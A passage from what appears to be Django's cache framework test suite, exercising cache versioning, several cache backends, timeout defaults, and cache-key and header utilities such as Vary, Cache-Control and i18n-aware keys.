self.assertEqual(cache.get('answer1', version=1), None)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=2)
self.assertEqual(cache.get('answer1', version=1), None)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.add('answer1', 37, version=1)
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
# v2 add, using default version = 2
caches['v2'].add('answer2', 42)
self.assertEqual(cache.get('answer2', version=1), None)
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37)
self.assertEqual(cache.get('answer2', version=1), None)
self.assertEqual(cache.get('answer2', version=2), 42)
caches['v2'].add('answer2', 37, version=1)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
# v2 add, default version = 2, but manually override version = 1
caches['v2'].add('answer3', 42, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), None)
caches['v2'].add('answer3', 37, version=1)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), None)
caches['v2'].add('answer3', 37)
self.assertEqual(cache.get('answer3', version=1), 42)
self.assertEqual(cache.get('answer3', version=2), 37)
def test_cache_versioning_has_key(self):
cache.set('answer1', 42)
# has_key
self.assertTrue(cache.has_key('answer1'))
self.assertTrue(cache.has_key('answer1', version=1))
self.assertFalse(cache.has_key('answer1', version=2))
self.assertFalse(caches['v2'].has_key('answer1'))
self.assertTrue(caches['v2'].has_key('answer1', version=1))
self.assertFalse(caches['v2'].has_key('answer1', version=2))
def test_cache_versioning_delete(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.delete('answer1')
self.assertEqual(cache.get('answer1', version=1), None)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.delete('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), None)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].delete('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), None)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].delete('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), None)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_incr_decr(self):
cache.set('answer1', 37, version=1)
cache.set('answer1', 42, version=2)
cache.incr('answer1')
self.assertEqual(cache.get('answer1', version=1), 38)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.decr('answer1')
self.assertEqual(cache.get('answer1', version=1), 37)
self.assertEqual(cache.get('answer1', version=2), 42)
cache.set('answer2', 37, version=1)
cache.set('answer2', 42, version=2)
cache.incr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 43)
cache.decr('answer2', version=2)
self.assertEqual(cache.get('answer2', version=1), 37)
self.assertEqual(cache.get('answer2', version=2), 42)
cache.set('answer3', 37, version=1)
cache.set('answer3', 42, version=2)
caches['v2'].incr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 43)
caches['v2'].decr('answer3')
self.assertEqual(cache.get('answer3', version=1), 37)
self.assertEqual(cache.get('answer3', version=2), 42)
cache.set('answer4', 37, version=1)
cache.set('answer4', 42, version=2)
caches['v2'].incr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 38)
self.assertEqual(cache.get('answer4', version=2), 42)
caches['v2'].decr('answer4', version=1)
self.assertEqual(cache.get('answer4', version=1), 37)
self.assertEqual(cache.get('answer4', version=2), 42)
def test_cache_versioning_get_set_many(self):
# set, using default version = 1
cache.set_many({'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1']),
{'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertEqual(cache.get_many(['ford1', 'arthur1'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1']), {})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=1),
{'ford1': 37, 'arthur1': 42})
self.assertEqual(caches['v2'].get_many(['ford1', 'arthur1'], version=2), {})
# set, default version = 1, but manually override version = 2
cache.set_many({'ford2': 37, 'arthur2': 42}, version=2)
self.assertEqual(cache.get_many(['ford2', 'arthur2']), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(cache.get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2']),
{'ford2': 37, 'arthur2': 42})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford2', 'arthur2'], version=2),
{'ford2': 37, 'arthur2': 42})
# v2 set, using default version = 2
caches['v2'].set_many({'ford3': 37, 'arthur3': 42})
self.assertEqual(cache.get_many(['ford3', 'arthur3']), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(cache.get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3']),
{'ford3': 37, 'arthur3': 42})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=1), {})
self.assertEqual(caches['v2'].get_many(['ford3', 'arthur3'], version=2),
{'ford3': 37, 'arthur3': 42})
# v2 set, default version = 2, but manually override version = 1
caches['v2'].set_many({'ford4': 37, 'arthur4': 42}, version=1)
self.assertEqual(cache.get_many(['ford4', 'arthur4']),
{'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertEqual(cache.get_many(['ford4', 'arthur4'], version=2), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4']), {})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=1),
{'ford4': 37, 'arthur4': 42})
self.assertEqual(caches['v2'].get_many(['ford4', 'arthur4'], version=2), {})
def test_incr_version(self):
cache.set('answer', 42, version=2)
self.assertEqual(cache.get('answer'), None)
self.assertEqual(cache.get('answer', version=1), None)
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.get('answer', version=3), None)
self.assertEqual(cache.incr_version('answer', version=2), 3)
self.assertEqual(cache.get('answer'), None)
self.assertEqual(cache.get('answer', version=1), None)
self.assertEqual(cache.get('answer', version=2), None)
self.assertEqual(cache.get('answer', version=3), 42)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertEqual(caches['v2'].get('answer2', version=1), None)
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].get('answer2', version=3), None)
self.assertEqual(caches['v2'].incr_version('answer2'), 3)
self.assertEqual(caches['v2'].get('answer2'), None)
self.assertEqual(caches['v2'].get('answer2', version=1), None)
self.assertEqual(caches['v2'].get('answer2', version=2), None)
self.assertEqual(caches['v2'].get('answer2', version=3), 42)
self.assertRaises(ValueError, cache.incr_version, 'does_not_exist')
def test_decr_version(self):
cache.set('answer', 42, version=2)
self.assertEqual(cache.get('answer'), None)
self.assertEqual(cache.get('answer', version=1), None)
self.assertEqual(cache.get('answer', version=2), 42)
self.assertEqual(cache.decr_version('answer', version=2), 1)
self.assertEqual(cache.get('answer'), 42)
self.assertEqual(cache.get('answer', version=1), 42)
self.assertEqual(cache.get('answer', version=2), None)
caches['v2'].set('answer2', 42)
self.assertEqual(caches['v2'].get('answer2'), 42)
self.assertEqual(caches['v2'].get('answer2', version=1), None)
self.assertEqual(caches['v2'].get('answer2', version=2), 42)
self.assertEqual(caches['v2'].decr_version('answer2'), 1)
self.assertEqual(caches['v2'].get('answer2'), None)
self.assertEqual(caches['v2'].get('answer2', version=1), 42)
self.assertEqual(caches['v2'].get('answer2', version=2), None)
self.assertRaises(ValueError, cache.decr_version, 'does_not_exist', version=2)
def test_custom_key_func(self):
# Two caches with different key functions aren't visible to each other
cache.set('answer1', 42)
self.assertEqual(cache.get('answer1'), 42)
self.assertEqual(caches['custom_key'].get('answer1'), None)
self.assertEqual(caches['custom_key2'].get('answer1'), None)
caches['custom_key'].set('answer2', 42)
self.assertEqual(cache.get('answer2'), None)
self.assertEqual(caches['custom_key'].get('answer2'), 42)
self.assertEqual(caches['custom_key2'].get('answer2'), 42)
def test_cache_write_unpickable_object(self):
update_middleware = UpdateCacheMiddleware()
update_middleware.cache = cache
fetch_middleware = FetchFromCacheMiddleware()
fetch_middleware.cache = cache
request = self.factory.get('/cache/test')
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertEqual(get_cache_data, None)
response = HttpResponse()
content = 'Testing cookie serialization.'
response.content = content
response.set_cookie('foo', 'bar')
update_middleware.process_response(request, response)
get_cache_data = fetch_middleware.process_request(request)
self.assertNotEqual(get_cache_data, None)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
update_middleware.process_response(request, get_cache_data)
get_cache_data = fetch_middleware.process_request(request)
self.assertNotEqual(get_cache_data, None)
self.assertEqual(get_cache_data.content, content.encode('utf-8'))
self.assertEqual(get_cache_data.cookies, response.cookies)
def test_add_fail_on_pickleerror(self):
"See https://code.djangoproject.com/ticket/21200"
with self.assertRaises(pickle.PickleError):
cache.add('unpickable', Unpickable())
def test_set_fail_on_pickleerror(self):
"See https://code.djangoproject.com/ticket/21200"
with self.assertRaises(pickle.PickleError):
cache.set('unpickable', Unpickable())
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.db.DatabaseCache',
# Spaces are used in the table name to ensure quoting/escaping is working
LOCATION='test cache table'
))
class DBCacheTests(BaseCacheTests, TransactionTestCase):
available_apps = ['cache']
def setUp(self):
# The super calls needs to happen first for the settings override.
super(DBCacheTests, self).setUp()
self.create_table()
def tearDown(self):
# The super call needs to happen first because it uses the database.
super(DBCacheTests, self).tearDown()
self.drop_table()
def create_table(self):
management.call_command('createcachetable', verbosity=0, interactive=False)
def drop_table(self):
with connection.cursor() as cursor:
table_name = connection.ops.quote_name('test cache table')
cursor.execute('DROP TABLE %s' % table_name)
def test_zero_cull(self):
self._perform_cull_test(caches['zero_cull'], 50, 18)
def test_second_call_doesnt_crash(self):
stdout = six.StringIO()
management.call_command(
'createcachetable',
stdout=stdout
)
self.assertEqual(stdout.getvalue(),
"Cache table 'test cache table' already exists.\n" * len(settings.CACHES))
def test_createcachetable_with_table_argument(self):
"""
Delete and recreate cache table with legacy behavior (explicitly
specifying the table name).
"""
self.drop_table()
stdout = six.StringIO()
management.call_command(
'createcachetable',
'test cache table',
verbosity=2,
stdout=stdout
)
self.assertEqual(stdout.getvalue(),
"Cache table 'test cache table' created.\n")
def test_clear_commits_transaction(self):
# Ensure the database transaction is committed (#19896)
cache.set("key1", "spam")
cache.clear()
transaction.rollback()
self.assertEqual(cache.get("key1"), None)
@override_settings(USE_TZ=True)
class DBCacheWithTimeZoneTests(DBCacheTests):
pass
class DBCacheRouter(object):
"""A router that puts the cache table on the 'other' database."""
def db_for_read(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
def db_for_write(self, model, **hints):
if model._meta.app_label == 'django_cache':
return 'other'
def allow_migrate(self, db, model):
if model._meta.app_label == 'django_cache':
return db == 'other'
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.db.DatabaseCache',
'LOCATION': 'my_cache_table',
},
},
)
class CreateCacheTableForDBCacheTests(TestCase):
multi_db = True
def test_createcachetable_observes_database_router(self):
old_routers = router.routers
try:
router.routers = [DBCacheRouter()]
# cache table should not be created on 'default'
with self.assertNumQueries(0, using='default'):
management.call_command('createcachetable',
database='default',
verbosity=0, interactive=False)
# cache table should be created on 'other'
# Queries:
# 1: check table doesn't already exist
# 2: create savepoint (if transactional DDL is supported)
# 3: create the table
# 4: create the index
# 5: release savepoint (if transactional DDL is supported)
num = 5 if connections['other'].features.can_rollback_ddl else 3
with self.assertNumQueries(num, using='other'):
management.call_command('createcachetable',
database='other',
verbosity=0, interactive=False)
finally:
router.routers = old_routers
class PicklingSideEffect(object):
def __init__(self, cache):
self.cache = cache
self.locked = False
def __getstate__(self):
if self.cache._lock.active_writers:
self.locked = True
return {}
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.locmem.LocMemCache',
))
class LocMemCacheTests(BaseCacheTests, TestCase):
def setUp(self):
super(LocMemCacheTests, self).setUp()
# LocMem requires a hack to make the other caches
# share a data store with the 'normal' cache.
caches['prefix']._cache = cache._cache
caches['prefix']._expire_info = cache._expire_info
caches['v2']._cache = cache._cache
caches['v2']._expire_info = cache._expire_info
caches['custom_key']._cache = cache._cache
caches['custom_key']._expire_info = cache._expire_info
caches['custom_key2']._cache = cache._cache
caches['custom_key2']._expire_info = cache._expire_info
@override_settings(CACHES={
'default': {'BACKEND': 'django.core.cache.backends.locmem.LocMemCache'},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other'
},
})
def test_multiple_caches(self):
"Check that multiple locmem caches are isolated"
cache.set('value', 42)
self.assertEqual(caches['default'].get('value'), 42)
self.assertEqual(caches['other'].get('value'), None)
def test_locking_on_pickle(self):
"""#20613/#18541 -- Ensures pickling is done outside of the lock."""
bad_obj = PicklingSideEffect(cache)
cache.set('set', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
cache.add('add', bad_obj)
self.assertFalse(bad_obj.locked, "Cache was locked during pickling")
def test_incr_decr_timeout(self):
"""incr/decr does not modify expiry time (matches memcached behavior)"""
key = 'value'
_key = cache.make_key(key)
cache.set(key, 1, timeout=cache.default_timeout * 10)
expire = cache._expire_info[_key]
cache.incr(key)
self.assertEqual(expire, cache._expire_info[_key])
cache.decr(key)
self.assertEqual(expire, cache._expire_info[_key])
# memcached backend isn't guaranteed to be available.
# To check the memcached backend, the test settings file will
# need to contain at least one cache backend setting that points at
# your memcache server.
memcached_params = {}
for _cache_params in settings.CACHES.values():
if _cache_params['BACKEND'].startswith('django.core.cache.backends.memcached.'):
memcached_params = _cache_params
@unittest.skipUnless(memcached_params, "memcached not available")
@override_settings(CACHES=caches_setting_for_tests(base=memcached_params))
class MemcachedCacheTests(BaseCacheTests, TestCase):
def test_invalid_keys(self):
"""
On memcached, we don't introduce a duplicate key validation
step (for speed reasons), we just let the memcached API
library raise its own exception on bad keys. Refs #6447.
In order to be memcached-API-library agnostic, we only assert
that a generic exception of some kind is raised.
"""
# memcached does not allow whitespace or control characters in keys
self.assertRaises(Exception, cache.set, 'key with spaces', 'value')
# memcached limits key length to 250
self.assertRaises(Exception, cache.set, 'a' * 251, 'value')
# Explicitly display a skipped test if no configured cache uses MemcachedCache
@unittest.skipUnless(
memcached_params.get('BACKEND') == 'django.core.cache.backends.memcached.MemcachedCache',
"cache with python-memcached library not available")
def test_memcached_uses_highest_pickle_version(self):
# Regression test for #19810
for cache_key, cache in settings.CACHES.items():
if cache['BACKEND'] == 'django.core.cache.backends.memcached.MemcachedCache':
self.assertEqual(caches[cache_key]._cache.pickleProtocol,
pickle.HIGHEST_PROTOCOL)
def test_cull(self):
# culling isn't implemented, memcached deals with it.
pass
def test_zero_cull(self):
# culling isn't implemented, memcached deals with it.
pass
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
"""
Specific test cases for the file-based cache.
"""
def setUp(self):
super(FileBasedCacheTests, self).setUp()
self.dirname = tempfile.mkdtemp()
for cache_params in settings.CACHES.values():
cache_params.update({'LOCATION': self.dirname})
def tearDown(self):
shutil.rmtree(self.dirname)
super(FileBasedCacheTests, self).tearDown()
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_creates_cache_dir_if_nonexistent(self):
os.rmdir(self.dirname)
cache.set('foo', 'bar')
os.path.exists(self.dirname)
@override_settings(CACHES={
'default': {
'BACKEND': 'cache.liberal_backend.CacheClass',
},
})
class CustomCacheKeyValidationTests(TestCase):
"""
Tests for the ability to mixin a custom ``validate_key`` method to
a custom cache backend that otherwise inherits from a builtin
backend, and override the default key validation. Refs #6447.
"""
def test_custom_key_validation(self):
# this key is both longer than 250 characters, and has spaces
key = 'some key with spaces' * 15
val = 'a value'
cache.set(key, val)
self.assertEqual(cache.get(key), val)
@override_settings(
CACHES={
'default': {
'BACKEND': 'cache.closeable_cache.CacheClass',
}
}
)
class GetCacheTests(IgnoreDeprecationWarningsMixin, TestCase):
def test_simple(self):
from django.core.cache import caches, get_cache
self.assertIsInstance(
caches[DEFAULT_CACHE_ALIAS],
get_cache('default').__class__
)
cache = get_cache(
'django.core.cache.backends.dummy.DummyCache',
**{'TIMEOUT': 120}
)
self.assertEqual(cache.default_timeout, 120)
self.assertRaises(InvalidCacheBackendError, get_cache, 'does_not_exist')
def test_close(self):
from django.core import signals
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
def test_close_deprecated(self):
from django.core.cache import get_cache
from django.core import signals
cache = get_cache('cache.closeable_cache.CacheClass')
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
DEFAULT_MEMORY_CACHES_SETTINGS = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
}
}
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None
class DefaultNonExpiringCacheKeyTests(TestCase):
"""Tests that verify that settings having Cache arguments with a TIMEOUT
set to `None` will create Caches that will set non-expiring keys.
This fixes ticket #22085.
"""
def setUp(self):
# The 5 minute (300 seconds) default expiration time for keys is
# defined in the implementation of the initializer method of the
# BaseCache type.
self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout
def tearDown(self):
del(self.DEFAULT_TIMEOUT)
def test_default_expiration_time_for_keys_is_5_minutes(self):
"""The default expiration time of a cache key is 5 minutes.
This value is defined inside the __init__() method of the
:class:`django.core.cache.backends.base.BaseCache` type.
"""
self.assertEqual(300, self.DEFAULT_TIMEOUT)
def test_caches_with_unset_timeout_has_correct_default_timeout(self):
"""Caches that have the TIMEOUT parameter undefined in the default
settings will use the default 5 minute timeout.
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertEqual(self.DEFAULT_TIMEOUT, cache.default_timeout)
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
"""Memory caches that have the TIMEOUT parameter set to `None` in the
default settings with have `None` as the default timeout.
This means "no timeout".
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertIs(None, cache.default_timeout)
self.assertEqual(None, cache.get_backend_timeout())
@override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
def test_caches_with_unset_timeout_set_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter unset will set cache
keys having the default 5 minute timeout.
"""
key = "my-key"
value = "my-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertNotEqual(None, cache._expire_info[cache_key])
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def text_caches_set_with_timeout_as_none_set_non_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter set to `None` will set
a non expiring key by default.
"""
key = "another-key"
value = "another-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertEqual(None, cache._expire_info[cache_key])
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class CacheUtils(TestCase):
"""TestCase for django.utils.cache functions."""
def setUp(self):
self.host = 'www.example.com'
self.path = '/cache/test/'
self.factory = RequestFactory(HTTP_HOST=self.host)
def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
request = self._get_request(self.host, self.path,
method, query_string=query_string)
request._cache_update_cache = True if not update_cache else update_cache
return request
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
response = HttpResponse()
if initial_vary is not None:
response['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = HttpResponse()
key_prefix = 'localprefix'
# Expect None if no headers have been set yet.
self.assertEqual(get_cache_key(request), None)
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
# Verify that a specified key_prefix is taken into account.
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertEqual(get_cache_key(request), None)
# Set headers to an empty list.
learn_cache_key(request, response)
# Verify that the querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
)
def test_cache_key_varies_by_url(self):
"""
get_cache_key keys differ by fully-qualified URL instead of path
"""
request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
learn_cache_key(request1, HttpResponse())
request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
learn_cache_key(request2, HttpResponse())
self.assertTrue(get_cache_key(request1) != get_cache_key(request2))
def test_learn_cache_key(self):
request = self.factory.head(self.path)
response = HttpResponse()
response['Vary'] = 'Pony'
# Make sure that the Vary header is added to the key hash
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_patch_cache_control(self):
tests = (
# Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
(None, {'private': True}, set(['private'])),
# Test whether private/public attributes are mutually exclusive
('private', {'private': True}, set(['private'])),
('private', {'public': True}, set(['public'])),
('public', {'public': True}, set(['public'])),
('public', {'private': True}, set(['private'])),
('must-revalidate,max-age=60,private', {'public': True}, set(['must-revalidate', 'max-age=60', 'public'])),
('must-revalidate,max-age=60,public', {'private': True}, set(['must-revalidate', 'max-age=60', 'private'])),
('must-revalidate,max-age=60', {'public': True}, set(['must-revalidate', 'max-age=60', 'public'])),
)
cc_delim_re = re.compile(r'\s*,\s*')
for initial_cc, newheaders, expected_cc in tests:
response = HttpResponse()
if initial_cc is not None:
response['Cache-Control'] = initial_cc
patch_cache_control(response, **newheaders)
parts = set(cc_delim_re.split(response['Cache-Control']))
self.assertEqual(parts, expected_cc)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix',
},
},
)
class PrefixedCacheUtils(CacheUtils):
pass
@override_settings(
CACHE_MIDDLEWARE_SECONDS=60,
CACHE_MIDDLEWARE_KEY_PREFIX='test',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
)
class CacheHEADTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
def _set_cache(self, request, msg):
response = HttpResponse()
response.content = msg
return UpdateCacheMiddleware().process_response(request, response)
def test_head_caches_correctly(self):
test_content = 'test content'
request = self.factory.head(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertNotEqual(get_cache_data, None)
self.assertEqual(test_content.encode(), get_cache_data.content)
def test_head_with_cached_get(self):
test_content = 'test content'
request = self.factory.get(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
get_cache_data = FetchFromCacheMiddleware().process_request(request)
self.assertNotEqual(get_cache_data, None)
self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
LANGUAGES=(
('en', 'English'),
('es', 'Spanish'),
),
)
class CacheI18nTest(TestCase):
def setUp(self):
self.path = '/cache/test/'
self.factory = RequestFactory()
def tearDown(self):
cache.clear()
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
def check_accept_language_vary(self, accept_language, vary, reference_key):
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = vary
key = learn_cache_key(request, response)
key2 = get_cache_key(request)
self.assertEqual(key, reference_key)
self.assertEqual(key2, reference_key)
@override_settings(USE_I18N=True, USE_L10N=False, USE_TZ=False)
def test_cache_key_i18n_translation_accept_language(self):
lang = translation.get_language()
self.assertEqual(lang, 'en')
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response['Vary'] = 'accept-encoding'
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
self.check_accept_language_vary(
'en-us',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'en-US',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8',
'accept-encoding, accept-language, cookie',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8,ko;q=0.6',
'accept-language, cookie, accept-encoding',
key
)
self.check_accept_language_vary(
'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
'accept-encoding, cookie, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
'accept-language, accept-encoding, cookie',
key
)
self.check_accept_language_vary(
'ko;q=1.0,en;q=0.5',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'ko, en',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR, en-US',
'accept-encoding, accept-language, cookie',
key
)
@override_settings(USE_I18N=False, USE_L10N=True, USE_TZ=False)
def test_cache_key_i18n_formatting(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when formatting is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False, USE_TZ=True)
def test_cache_key_i18n_timezone(self):
request = self.factory.get(self.path)
# This is tightly coupled to the implementation,
# but it's the most straightforward way to test the key.
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False, USE_L10N=False)
def test_cache_key_no_i18n(self):
request = self.factory.get(self.path)
lang = translation.get_language()
tz = force_text(timezone.get_current_timezone_name(), errors='ignore')
tz = tz.encode('ascii', 'ignore').decode('ascii').replace(' ', '_')
response = HttpResponse()
key = learn_cache_key(request, response)
